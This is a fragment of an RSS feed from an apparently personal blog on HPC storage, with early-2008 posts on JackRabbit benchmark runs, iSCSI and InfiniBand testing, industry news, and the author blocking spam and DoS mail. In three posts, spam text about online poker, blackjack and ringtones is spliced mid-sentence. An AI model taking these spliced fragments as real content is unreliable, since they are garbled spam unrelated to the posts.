 * The larger systems (&amp;gt;$500k) grew  at 24% year-over-year to $3.2B. * Divisional systems ($250-499k) grew 19% to $1.</description>
    </item>
    
    <item>
      <title>They&#39;re back!!!</title>
      <link>https://blog.scalability.org/2008/02/theyre-back/</link>
      <pubDate>Wed, 20 Feb 2008 15:05:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/theyre-back/</guid>
      <description>[Queue scary music]
[ ](/images/they-are-back.png)
Ok, firewall rules turned on again. Hey DoSer &amp;hellip; this gets old. We are blocking all mail from .isp.att.net and dnsvr.com. Feel free to do the same. Update: Firewall rules on, DoSer goes buh-bye. Folks, we need to have zero tolerance for this behavior. Bug me offline if you want to see our blocklist for them.</description>
    </item>
    
    <item>
      <title>There are reports and studies, and there is reality ...</title>
      <link>https://blog.scalability.org/2008/02/there-are-reports-and-studies-and-there-is-reality/</link>
      <pubDate>Wed, 20 Feb 2008 14:00:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/there-are-reports-and-studies-and-there-is-reality/</guid>
      <description>I have noticed something recently. Others have noticed it as well. It is hard to find talent in Linux and OSS technologies. Now before the crowds of gleeful non-OSS companies get on a marketing roll here, and quote me out of context (gee, like that&amp;rsquo;s never happened), it is worth asking the question &amp;ldquo;why&amp;rdquo;.
It&amp;rsquo;s not because they aren&amp;rsquo;t out there. No. There are lots. It is because most of the ones I have spoken to to try to offload us, are themselves overloaded and busy.</description>
    </item>
    
    <item>
      <title>Every now and then you are reminded ...</title>
      <link>https://blog.scalability.org/2008/02/every-now-and-then-you-are-reminded/</link>
      <pubDate>Wed, 20 Feb 2008 06:27:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/every-now-and-then-you-are-reminded/</guid>
      <description>&amp;hellip; that people don&amp;rsquo;t know about your products. Robin at StorageMojo reported on the death of Apple&amp;rsquo;s Xserve/Xraid unit. He noted &amp;hellip;
then asked
We can quote 24, 36, and 48 TB chunks, all under $1/GB. I left a note in his comments, and I hope it wasn&amp;rsquo;t inappropriate; just a short informational pointer. This shows that we have lots more work to do to get the message out. For those who didn&amp;rsquo;t see, we sustained 1.</description>
    </item>
    
    <item>
      <title>More company information:  ClearSpeed</title>
      <link>https://blog.scalability.org/2008/02/more-company-information-clearspeed/</link>
      <pubDate>Tue, 19 Feb 2008 19:45:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/more-company-information-clearspeed/</guid>
      <description>As I noted recently in the post on SGI, they are having a tough time of it, in large part due to who they are competing against, and what they have to use to compete with. Well, they aren&amp;rsquo;t the only company with issues. As noted on InsideHPC and elsewhere, ClearSpeed is not having a great time of it either.
[ ](http://finance.yahoo.com/q/bc?s=CSD.L&amp;amp;t=2y&amp;amp;l=on&amp;amp;z=m&amp;amp;q=l&amp;amp;c=)
Basically ClearSpeed makes accelerated CPUs. Each CPU has 96 cores layed out in a systolic array.</description>
    </item>
    
    <item>
      <title>Cray nails a large contract</title>
      <link>https://blog.scalability.org/2008/02/cray-nails-a-large-contract/</link>
      <pubDate>Tue, 19 Feb 2008 16:47:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/cray-nails-a-large-contract/</guid>
      <description>As InsideHPC reports, Cray has nailed a large DoD contract. Good for Cray. Sadly they did report not that great earnings recently, and some publications have been beating on them a bit.
Cray is a good company. They have vision, and solid products. They are differentiated. They are not the low end of the market, though with a little work, I bet they could address it (and do so within their vision).</description>
    </item>
    
    <item>
      <title>A good question</title>
      <link>https://blog.scalability.org/2008/02/a-good-question/</link>
      <pubDate>Tue, 19 Feb 2008 02:42:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/a-good-question/</guid>
      <description>John at the always interesting InsideHPCasks a very important question, that, oddly, I think I can answer.
The overall article is on the SGI salvage of LNXI assets. John&amp;rsquo;s question was
They are not. You can see it quite clearly on the financial charts
[ ](http://finance.yahoo.com/q/bc?s=SGIC&amp;amp;t=2y&amp;amp;l=on&amp;amp;z=m&amp;amp;q=l&amp;amp;c=)
The company&amp;rsquo;s stats can be read from the Yahoo page, go ahead and click the picture and you can see it. Their market cap is less than $200M.</description>
    </item>
    
    <item>
      <title>Why ext3 needs to go the way of the dodo ...</title>
      <link>https://blog.scalability.org/2008/02/why-ext3-needs-to-go-the-way-of-the-dodo/</link>
      <pubDate>Mon, 18 Feb 2008 16:30:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/why-ext3-needs-to-go-the-way-of-the-dodo/</guid>
      <description>root@pegasus-i:~# mdadm &amp;ndash;create /dev/md0 &amp;ndash;level=0 &amp;ndash;raid-devices=2 /dev/sdc /dev/sdd mdadm: array /dev/md0 started. root@pegasus-i:~# cat /proc/mdstat Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] md0 : active raid0 sdd[1] sdc[0] 9765425152 blocks root@pegasus-i:~# mkfs.ext3 /dev/md0 mke2fs 1.40.2 (12-Jul-2007) mkfs.ext3: Filesystem too large. No more than 2**31-1 blocks (8TB using a blocksize of 4k) are currently supported. Stick a fork in it &amp;hellip; its done.</description>
    </item>
    
    <item>
      <title>iSCSI over 10GbE to real disk</title>
      <link>https://blog.scalability.org/2008/02/iscsi-over-10gbe-to-real-disk/</link>
      <pubDate>Sun, 17 Feb 2008 07:03:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/iscsi-over-10gbe-to-real-disk/</guid>
      <description>Simple-write/read show 450-550 MB/s to real disk. Bonnie++ &amp;hellip;
`
[root@pegasus-i io-bm]# bonnie++ -u root -d /big/ -f Using uid:0, gid:0. Writing intelligently...done Rewriting...done Reading intelligently...done start &#39;em...done...done...done... Create files in sequential order...done. Stat files in sequential order...done. Delete files in sequential order...done. Create files in random order...done. Stat files in random order...done. Delete files in random order...done. Version 1.03 ------Sequential Output------ --Sequential Input- --Random- -Per Chr- --Block-- -Rewrite- -Per Chr- --Block-- --Seeks-- Machine Size K/sec %CP K/sec %CP K/sec %CP K/sec %CP K/sec %CP /sec %CP pegasus-i 24008M 515250 88 246596 62 409339 90 254.</description>
    </item>
    
    <item>
      <title>How effective was our blocking of 2 networks for spam?</title>
      <link>https://blog.scalability.org/2008/02/how-effective-was-our-blocking-of-2-networks-for-spam/</link>
      <pubDate>Fri, 15 Feb 2008 19:24:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/how-effective-was-our-blocking-of-2-networks-for-spam/</guid>
      <description>Well &amp;hellip; judge for yourself.
[ ](/images/blocked.png)
Yahoo/ATT and the other guys &amp;hellip; you have a problem you need to address. Worth noting: The following are the IP/nets we are blocking access to port 25.
AT&amp;amp;T;/Yahoo: 207.115.11.0/24 204.127.217.0/24 DNSVR: 71.6.153.204 216.40.239.162 216.40.250.39  I do not believe in RBLs. Likely we are losing mail. But then again, the good folks at these sites did not seem to do more than auto-acknowledge my concerns over the use of their infrastructure to DoS us.</description>
    </item>
    
    <item>
      <title>LNXI (Linux Networx) is done</title>
      <link>https://blog.scalability.org/2008/02/lnxi-linux-networx-is-done/</link>
      <pubDate>Fri, 15 Feb 2008 13:28:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/lnxi-linux-networx-is-done/</guid>
      <description>SGI acquired the assets yesterday. Sad, LNXI was one of the good ones. Like us, a real HPC shop. They got killed (my guess) by going after huge government systems with long drawn out acceptance tests. Which killed their cash flow, and put them into an unsafe business area. Look, HPC is just like any other business, you have to be able to distinguish good business from bad business. Some business you cannot afford to pursue, the cost of winning is simply too high.</description>
    </item>
    
    <item>
      <title>In order to block spam, we are now rejecting all mail from isp.att.net</title>
      <link>https://blog.scalability.org/2008/02/in-order-to-block-spam-we-are-now-rejecting-all-mail-from-ispattnet/</link>
      <pubDate>Fri, 15 Feb 2008 01:49:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/in-order-to-block-spam-we-are-now-rejecting-all-mail-from-ispattnet/</guid>
      <description>I hope someone from isp.att.net reads this. I have sent email to abuse@att.net, to spam@att.net, and so on. I have filled out the necessary forms on their website. Yet, sadly, no response from them. So I have taken the minimal of draconian measures. I put a simple rule in our mailer to automatically reject connections from isp.att.net. If this is problematic for you, please send me email at gmail.com. I am joe.</description>
    </item>
    
    <item>
      <title>Looks like Novell will get paid after all</title>
      <link>https://blog.scalability.org/2008/02/looks-like-novell-will-get-paid-after-all/</link>
      <pubDate>Fri, 15 Feb 2008 00:36:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/looks-like-novell-will-get-paid-after-all/</guid>
      <description>A company apparently has demonstrated the validity of a P.T. Barnum quote . SCO is going private. PJ at Groklaw has a note on this. So after this is over and SCO goes private, Novell ought to get its appropriate share of the about $50M or so of license revenue that SCO owes it &amp;hellip; right? Which leaves about $50M for the IBM lawyers to go after. Maybe the title should have been &amp;ldquo;night of the living dead&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>Not bad:  1.3 GB/s on reads</title>
      <link>https://blog.scalability.org/2008/02/not-bad-13-gbs-on-reads/</link>
      <pubDate>Thu, 14 Feb 2008 19:08:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/not-bad-13-gbs-on-reads/</guid>
      <description>`root@jr1:~# ./simple-w3.bash
 sync echo -n &amp;lsquo;start at &#39; start at + date Thu Feb 14 13:33:03 EST 2008 dd if=/dev/zero of=/big/local.file.5962 bs=8388608 count=10000 oflag=direct 10000+0 records in 10000+0 records out 83886080000 bytes (84 GB) copied, 68.8322 seconds, 1.2 GB/s sync echo -n &amp;lsquo;stop at &#39; stop at + date Thu Feb 14 13:34:12 EST 2008 root@jr1:~# ./simple-w root@jr1:~# mv /big/local.file.5962 /big/local.file root@jr1:~# ./simple-read.bash sync echo -n &amp;lsquo;start at &#39; start at + date Thu Feb 14 13:34:32 EST 2008 dd if=/big/local.</description>
    </item>
    
    <item>
      <title>A baseline before tuning</title>
      <link>https://blog.scalability.org/2008/02/a-baseline-before-tuning/</link>
      <pubDate>Thu, 14 Feb 2008 13:38:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/a-baseline-before-tuning/</guid>
      <description>Building a large JackRabbit. 2 raid controllers, quite a few other goodies (CF boot!). Doing some testing for burn in, including our &amp;ldquo;simple-write&amp;rdquo; benchmark from a few posts ago. I haven&amp;rsquo;t done any tuning yet. Honest. The throttle is not cracked wide open, the JackRabbit is not running at full potential. It doesn&amp;rsquo;t even have its full complement of RAM, or cache. The folks shipping those to us shipped us the wrong RAM, so these are 2x 2GB sticks that we had for our testing unit.</description>
    </item>
    
    <item>
      <title>We&#39;ve got mail!!!</title>
      <link>https://blog.scalability.org/2008/02/weve-got-mail/</link>
      <pubDate>Wed, 13 Feb 2008 20:38:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/weve-got-mail/</guid>
      <description>Ok, we are being mailbombed as I write this. I know, I know, tin foil hats.
[ ](/images/mail-bombing-in-progress.png)
I don&amp;rsquo;t mean to taunt the folks doing this, but 6 messages per minute? C&amp;rsquo;mon. This system withstood 250k in a 12 hour period about 6 months ago. Thats 347/minute. I won&amp;rsquo;t tell you what the user load was on the system then, but it wasn&amp;rsquo;t high. Didn&amp;rsquo;t even break &amp;ldquo;1&amp;rdquo; as I remember &amp;hellip;.</description>
    </item>
    
    <item>
      <title>Whither LNXI?</title>
      <link>https://blog.scalability.org/2008/02/whither-lnxi/</link>
      <pubDate>Wed, 13 Feb 2008 19:38:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/whither-lnxi/</guid>
      <description>Rumors being reported by John at InsideHPC.com suggest LNXI may not be long for this world. It would be sad to see them go. I had heard things like this in the past, in large part due to the problematic acceptance schedules of the government. When you sell a big huge thing to the government, the government withholds payment until you can prove it is working to their satisfaction. This is called the acceptance test.</description>
    </item>
    
    <item>
      <title>New large JackRabbit being built, hopefully will have some benchmarks to go with it</title>
      <link>https://blog.scalability.org/2008/02/new-large-jackrabbit-being-built-hopefully-will-have-some-benchmarks-to-go-with-it/</link>
      <pubDate>Wed, 13 Feb 2008 19:02:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/new-large-jackrabbit-being-built-hopefully-will-have-some-benchmarks-to-go-with-it/</guid>
      <description>Working on it now. Quite a few orders last week, so we are trying to get them built as quickly as possible. Still, I want to do some more benchmarking and updates. We will have a JackRabbit-S benchmark document done soon. Our results from testing that unit suggest that the new unit we are building may be &amp;hellip; very interesting &amp;hellip; in real performance. Hopefully we will see, soon. Missing some of the memory (supplier shipped us the wrong parts), and have some minor physical build work to do &amp;hellip; hopefully building the rest of the unit out later on today.</description>
    </item>
    
    <item>
      <title>Fan-boy-ism and HPC</title>
      <link>https://blog.scalability.org/2008/02/fan-boy-ism-and-hpc/</link>
      <pubDate>Wed, 13 Feb 2008 18:39:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/fan-boy-ism-and-hpc/</guid>
      <description>I have had discussions in email groups recently where I encountered some interesting phenomenon. Call it corporate cheerleading, or &amp;ldquo;fanboy&amp;rdquo; behavior. The signatures of this phenomenon are
 * Tendency to repeat marketing material as inherited from a higher diety * Tendency to attack other points of view not in line with their corporate-centric one * Tendency to attack posters of such views as being biased, and suggesting that competitive products that might be offered by the poster, but not mentioned or alluded to by the poster somehow constitute bashing.</description>
    </item>
    
    <item>
      <title>New day job web site is live</title>
      <link>https://blog.scalability.org/2008/02/new-day-job-web-site-is-live/</link>
      <pubDate>Mon, 11 Feb 2008 15:11:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/new-day-job-web-site-is-live/</guid>
      <description>Feel free to check it out. Been wanting to get this done for a while, had the code mostly written. Some work we are doing prompted the completion. Now it is there&amp;hellip; The nice aspect is that we can change the look and feel at any point. The code base is also quite simple. Even though it is Ajaxy for the the tab bar, it is also accessible (or should be) via the jQuery library degradation of functionality for non-javascript sites.</description>
    </item>
    
    <item>
      <title>Emergent behavior in complex systems ... or ... the fun of debugging your code</title>
      <link>https://blog.scalability.org/2008/02/emergent-behavior-in-complex-systems-or-the-fun-of-debugging-your-code/</link>
      <pubDate>Mon, 11 Feb 2008 01:55:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/emergent-behavior-in-complex-systems-or-the-fun-of-debugging-your-code/</guid>
      <description>Working on finally updating the day job&amp;rsquo;s web site. Expect it to go live in a day or less (less less!!!) Fixing some coding bits. At the end of the day, we had to choose between complex site building bits that sorta kinda worked, and our bits around DragonFly, that really did work, but required some coding. I didn&amp;rsquo;t want to write a website. Honest. I want there to be something akin to Powerpoint for web sites.</description>
    </item>
    
    <item>
      <title>iSCSI results for JackRabbit</title>
      <link>https://blog.scalability.org/2008/02/iscsi-results-for-jackrabbit/</link>
      <pubDate>Fri, 08 Feb 2008 03:02:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/iscsi-results-for-jackrabbit/</guid>
      <description>As you might know, we have been trying out a 10 GbE iSCSI connection to our JackRabbit server. We will be writing up a white paper about this later on. The issue I keep running into was not having a real benchmark test. Most of the benchmark tests we have seen have been, well, completely artificial, in that end user work loads aren&amp;rsquo;t anything like that. We want to try to test end user work loads whenever possible.</description>
    </item>
    
    <item>
      <title>Quads are in, and work ... wish the power supply did ...</title>
      <link>https://blog.scalability.org/2008/02/quads-are-in-and-work-wish-the-power-supply-did/</link>
      <pubDate>Fri, 08 Feb 2008 03:01:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/quads-are-in-and-work-wish-the-power-supply-did/</guid>
      <description>I got the quads, and put the MB into the machine, replacing the old MB. 64 GB capable MB with quad core AMDs. Plug it in, turn it on and &amp;hellip; whrrrr &amp;hellip;. whrrr &amp;hellip;. whrrrr &amp;hellip; Nada&amp;hellip; nothing. No boot. Post bios codes are FF. Of course FF is not in the manual listing all the post codes. Go figure.
Fine. Pull the MB out, put the old one in, the one I just pulled out to put this one in.</description>
    </item>
    
    <item>
      <title>Testing iSCSI over 10 GbE, iSER over IB, SRPT over IB, ...</title>
      <link>https://blog.scalability.org/2008/02/testing-iscsi-over-10-gbe-iser-over-ib-srpt-over-ib/</link>
      <pubDate>Fri, 08 Feb 2008 01:39:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/testing-iscsi-over-10-gbe-iser-over-ib-srpt-over-ib/</guid>
      <description>This will be short, no long discussion of benchmarks. Basically we tried JackRabbit as a target for many block oriented protocols. With 10 GbE, and with IB. I though 10 GbE would be badly beaten by IB in performance (real world, no ram disks here).
I think I was wrong. 10 GbE based iSCSI was quite simple to set up, pretty easy to tune, and actually nice to work with. Compare this to building SCST-SRPT or the right version of iSER or the correctly patched OFED for SCSI-TGT, or &amp;hellip; I like IB.</description>
    </item>
    
    <item>
      <title>SRP target oddities in RHEL/Centos 5.1</title>
      <link>https://blog.scalability.org/2008/02/srp-target-oddities-in-rhelcentos-51/</link>
      <pubDate>Thu, 07 Feb 2008 06:52:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/srp-target-oddities-in-rhelcentos-51/</guid>
      <description>A customer will be running RHEL/Centos 5.1 and wants to attach to a JackRabbit for high performance storage. Should be possible with iSCSI, though it looks like the single connection of the iSCSI initiator limits performance. At first I thought it was card related, though I now see multiple other cards that exhibit very similar performance issues. In fact our numbers are remarkably similar, though their performance was measured relative to ramdisk, and ours relative to JackRabbit disk.</description>
    </item>
    
    <item>
      <title>Found ... a pair of quads ..</title>
      <link>https://blog.scalability.org/2008/02/found-a-pair-of-quads/</link>
      <pubDate>Wed, 06 Feb 2008 19:15:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/found-a-pair-of-quads/</guid>
      <description>Searching all over. AMD has allowed the channel to be depleted. We are hearing from multiple sources that it will not be in the channel for a while. This is frustrating. It is nuts. It will do absolutely nothing to help AMD&amp;rsquo;s bottom line, and, that is one thing AMD sorely needs right now. All of our usual suppliers are saying they don&amp;rsquo;t have any. Now I found one supplier with some, and we are having them overnighted.</description>
    </item>
    
    <item>
      <title>A little JackRabbit on a test track</title>
      <link>https://blog.scalability.org/2008/02/a-little-jackrabbit-on-a-test-track/</link>
      <pubDate>Mon, 04 Feb 2008 18:20:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/a-little-jackrabbit-on-a-test-track/</guid>
      <description>I hadn&amp;rsquo;t mentioned it, perhaps I should have. We had been building/testing a unit, now sold and scheduled for shipping, which we wanted to see what it could do if we did some tuning. We tweaked, we measured, we tuned,Il poker online ? un gioco di carte. we listened. Did some trial runs. Then we cracked the throttle wide open and let &amp;lsquo;er rip.
root@jr1:~# ./simple-write.bash start at Sun Jan 27 13:31:49 EST 2008 100+0 records in 100+0 records out 13421772800 bytes (13 GB) copied, 15.</description>
    </item>
    
    <item>
      <title>initial iSCSI results for JackRabbit</title>
      <link>https://blog.scalability.org/2008/02/initial-iscsi-results-for-jackrabbit/</link>
      <pubDate>Mon, 04 Feb 2008 17:56:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/initial-iscsi-results-for-jackrabbit/</guid>
      <description>We have been working on testing/benchmarking JackRabbit iSCSI over 10 GbE. Without spilling too many beans, let me describe how our benchmark tests differ from most every one elses, and then I will talk about the performance we get. Most benchmarks we have seen on iSCSI target the nullio device, or the ram disk. That is, they are benchmarks of the protocol, and have little if anything to do with what you will actually observe for performance.</description>
    </item>
    
    <item>
      <title>On the massive over-proliferation of social networking sites</title>
      <link>https://blog.scalability.org/2008/02/on-the-massive-over-proliferation-of-social-networking-sites/</link>
      <pubDate>Sun, 03 Feb 2008 19:19:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/on-the-massive-over-proliferation-of-social-networking-sites/</guid>
      <description>Today I received yet-another-invitation-to-some-new-social-network -site-that-promises-to-be-different. I did what I do with all of these invitations these days. I ignored it. VC&amp;rsquo;s take note.
There are too many of these sites. The field is crowded. The sites are not differentiated. Few to none of them will be the next google. Or Microsoft. Few to none of the will be bought by google or Microsoft. These sites are little more than glorified web pages with databases.</description>
    </item>
    
    <item>
      <title>twas ...</title>
      <link>https://blog.scalability.org/2008/02/twas/</link>
      <pubDate>Sat, 02 Feb 2008 01:32:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/twas/</guid>
      <description>&amp;hellip; the night before groundhog day, and all through the stores &amp;hellip; not a Barcelona could be found, no one could get the cores
The POs were in, parts placed on the lab table with care, in hopes that shiny new Barcelonas would soon be there. The systems were built snugly in their cases, while power was waiting to light up their fascias &amp;hellip; and momma in her lab coat, and I in my head lamp, had just settled in to measure some Amps, When out there on the landing, there arose such a clatter, I though surely the UPS person had been around here.</description>
    </item>
    
    <item>
      <title>Sea change seemingly occuring in HPC for purchasers</title>
      <link>https://blog.scalability.org/2008/02/sea-change-seemingly-occuring-in-hpc-for-purchasers/</link>
      <pubDate>Fri, 01 Feb 2008 20:37:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/sea-change-seemingly-occuring-in-hpc-for-purchasers/</guid>
      <description>Last year, there was this meme, if only we could make cluster purchasing &amp;ldquo;easier&amp;rdquo;. Give people a one-stop shop for going online, and ordering their clusters. Lots of us (me included) thought this was going to be the wave of the future. Looks like we were, collectively, wrong.
We are being asked for more help now, not less. We are being asked for more specialized designs, not less. This doesn&amp;rsquo;t fit the model we thought would prevail.</description>
    </item>
    
    <item>
      <title>Inexpensive IB is here</title>
      <link>https://blog.scalability.org/2008/01/inexpensive-ib-is-here/</link>
      <pubDate>Mon, 28 Jan 2008 19:53:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/inexpensive-ib-is-here/</guid>
      <description>No, not &amp;ldquo;cheap&amp;rdquo; as in sub-standard, just inexpensive. See ClusterMonkey for details. Yeah, going to have to pick up some of these :) Even though I complain about OFED, when it works, it really works well. Building it is just a bear.</description>
    </item>
    
    <item>
      <title>Computing in the clouds ...</title>
      <link>https://blog.scalability.org/2008/01/computing-in-the-clouds/</link>
      <pubDate>Mon, 28 Jan 2008 17:34:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/computing-in-the-clouds/</guid>
      <description>Robin at Storagemojo tears into the latest buzzword-enabled marketing phrase, cloud computing. Robin&amp;rsquo;s thesis is that there are impediments to moving to the cloud, those being bandwidth and the &amp;ldquo;non-magic&amp;rdquo; nature of Google&amp;rsquo;s infrastructure. I don&amp;rsquo;t agree with his ascribing blame for the bandwidth issue to Cisco. It really is not their issue. Bandwidth providers in the US are the primary culprit &amp;hellip; we have been behind the curve for quite some time in terms of bandwidth delivered to business/homes.</description>
    </item>
    
    <item>
      <title>The need to keep building and packaging as separate operations</title>
      <link>https://blog.scalability.org/2008/01/the-need-to-keep-building-and-packaging-as-separate-operations/</link>
      <pubDate>Sat, 26 Jan 2008 16:23:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/the-need-to-keep-building-and-packaging-as-separate-operations/</guid>
      <description>I am workingFlagitiously perverse stupid see came abreast direction free free polyphonic ringtones to just download the theory over two, stewards as marys gray lichens and dejection indolent impertinence of fevered. &amp;hellip; no &amp;hellip; struggling to &amp;ldquo;build&amp;rdquo; OFED 1.2.5.4 for our systems. OFED, for those who are not aware, is the bolus of drivers/infrastructure to support infiniband. I won&amp;rsquo;t get into the IB vs 10 GbE debate here, I see room for both technologies.</description>
    </item>
    
    <item>
      <title>What would be considered good iSCSI bonnie performance?</title>
      <link>https://blog.scalability.org/2008/01/what-would-be-considered-good-iscsi-bonnie-performance/</link>
      <pubDate>Fri, 25 Jan 2008 08:04:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/what-would-be-considered-good-iscsi-bonnie-performance/</guid>
      <description>I am curious. Running JackRabbit with a pair of 10 GbE cards. Getting some numbers, wantLe Tavole di blackjack sono anche sia installano per Holdem e Omaha o Stud. to compare to others to see where we stand. Is more than 100 MB/s good? More than 200 MB/s? 300 MB/s? 10 GbE should give us ~1000MB/s. What fraction of the maximum bandwidth are you seeing in your iSCSI connection? We haven&amp;rsquo;t started tuning this yet.</description>
    </item>
    
    <item>
      <title>and a slightly hacked IOzone as well ...</title>
      <link>https://blog.scalability.org/2008/01/and-a-slightly-hacked-iozone-as-well/</link>
      <pubDate>Wed, 23 Jan 2008 22:24:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/and-a-slightly-hacked-iozone-as-well/</guid>
      <description>I wanted to test JackRabbit in cache, as well as out of cache. Unfortunately IOzone as written suffers from lots of 2G limits. and they limited their buffer sizes to 16M. So I bumped these up, and fixed the cache line size (it is 64 bytes for Opteron). `
 Run began: Wed Jan 23 17:14:25 2008 Excel chart generation enabled Auto Mode Using minimum file size of 16777216 kilobytes. Using Minimum Record Size 1048576 KB Using maximum file size of 16777216 kilobytes.</description>
    </item>
    
    <item>
      <title>more JackRabbit testing</title>
      <link>https://blog.scalability.org/2008/01/more-jackrabbit-testing/</link>
      <pubDate>Wed, 23 Jan 2008 21:30:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/more-jackrabbit-testing/</guid>
      <description>Updated a few things (bios) that I needed to. Reran tests. Remember, this is a sub $10,000 box (and it will do file and block IO &amp;hellip; simultaneously if needed). Running RAID6 with one hot spare.
&amp;lt;code&amp;gt; root@jr1:~# ./simple-read.bash start at Wed Jan 23 13:49:54 EST 2008 10000+0 records in 10000+0 records out 1342177280000 bytes (1.3 TB) copied, \ 1764.12 seconds, 761 MB/s stop at Wed Jan 23 14:19:18 EST 2008 &amp;lt;/code&amp;gt;  and its companion</description>
    </item>
    
    <item>
      <title>A question I touched on briefly ...</title>
      <link>https://blog.scalability.org/2008/01/a-question-i-touched-on-briefly/</link>
      <pubDate>Wed, 23 Jan 2008 18:09:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/a-question-i-touched-on-briefly/</guid>
      <description>this person at Interop news goes into, in depth. The business person in me had difficulty understanding the acquisition. Sun didn&amp;rsquo;t have a missing technological niche the MySQL filled. MySQL had all the standard problems of growing a business, compounded by the Open source revenue model, which effectively eliminates distribution/redistribution revenues. There are many commercial outfits likely skirting the edge of legitimacy using MySQL in their shipping supported closed source products.</description>
    </item>
    
    <item>
      <title>Another day, another JackRabbit ...</title>
      <link>https://blog.scalability.org/2008/01/another-day-another-jackrabbit/</link>
      <pubDate>Wed, 23 Jan 2008 15:46:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/another-day-another-jackrabbit/</guid>
      <description>Built a new one for testing in the lab, though it looks like it may have a happy home elsewhere (along with some of its brethren) quite soon. Previously, for our huge write test case, we had sustained about 612 MB/s way way outside cache for our 1.3 TB write. That was after the unit had finished building the array, and been quiesced. We are about 88% built, the array is still cranking, and I wanted to see what it could do with a few bits tied behind its back.</description>
    </item>
    
    <item>
      <title>You live, you learn, hopefully you don&#39;t make the same mistake twice ...</title>
      <link>https://blog.scalability.org/2008/01/you-live-you-learn-hopefully-you-dont-make-the-same-mistake-twice/</link>
      <pubDate>Tue, 22 Jan 2008 15:43:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/you-live-you-learn-hopefully-you-dont-make-the-same-mistake-twice/</guid>
      <description>About two years ago, we were &amp;ldquo;invited&amp;rdquo; to pitch our business and plans to a local VC event. This was good, we were in the hunt for capital, and getting in front of lots of VC&amp;rsquo;s isn&amp;rsquo;t a bad idea. Well the &amp;ldquo;invited&amp;rdquo; part is in scare quotes, we had to compete with our executive summary. Ok, so we made it past the initial &amp;ldquo;competition&amp;rdquo; (hmmm notice the scare quotes). We had to prepare our slides, our talks and some documents.</description>
    </item>
    
    <item>
      <title>Feedback is starting to emerge on the Sun|MySQL front</title>
      <link>https://blog.scalability.org/2008/01/feedback-is-starting-to-emerge-on-the-sunmysql-front/</link>
      <pubDate>Mon, 21 Jan 2008 00:55:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/feedback-is-starting-to-emerge-on-the-sunmysql-front/</guid>
      <description>and it isn&amp;rsquo;t necessarily all positive. Well, ok, not on the acquisition, but on the current state of affairs prior to the acquisition. This is the interesting aspect of this. Sun is being viewed as a way to save MySQL. Don MacAskill of smugmug has some interesting comments. Quoting Don:
The Laura to which he refers is Laura Thompson, and her blog, tech ramblings. The particular post  discusses some of the issues.</description>
    </item>
    
    <item>
      <title>mpiHMMer update</title>
      <link>https://blog.scalability.org/2008/01/mpihmmer-update/</link>
      <pubDate>Sun, 20 Jan 2008 22:22:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/mpihmmer-update/</guid>
      <description>Well, we now have a mailing list and a repository up in addition to the main page. There are some binary RPMs available. My question to the teaming masses of mpiHMMer users (current or future), what platforms/architectures/OSes are you interested in binary builds for? And support for? Please either answer in a response to this or on the mailing list. This would be quite helpful to know going forward.</description>
    </item>
    
    <item>
      <title>Sun buys Mysql</title>
      <link>https://blog.scalability.org/2008/01/sun-buys-mysql/</link>
      <pubDate>Wed, 16 Jan 2008 13:45:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/sun-buys-mysql/</guid>
      <description>So Sun continues their buying spree. First with CFS, and now Mysql. This is quite relevant to HPC for a variety of reasons. Customers have been telling me that they are quite worried about Lustre as a result of the Sun acquisition. There is a lot of speculation about its (likely) limited future outside of Solaris.
Then there is ZFS, the sort of - kind of - open source file system that is sort of - kind of - better than anything else.</description>
    </item>
    
    <item>
      <title>Scientific instrument advertising ... done right!</title>
      <link>https://blog.scalability.org/2008/01/scientific-instrument-advertising-done-right/</link>
      <pubDate>Mon, 14 Jan 2008 18:05:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/scientific-instrument-advertising-done-right/</guid>
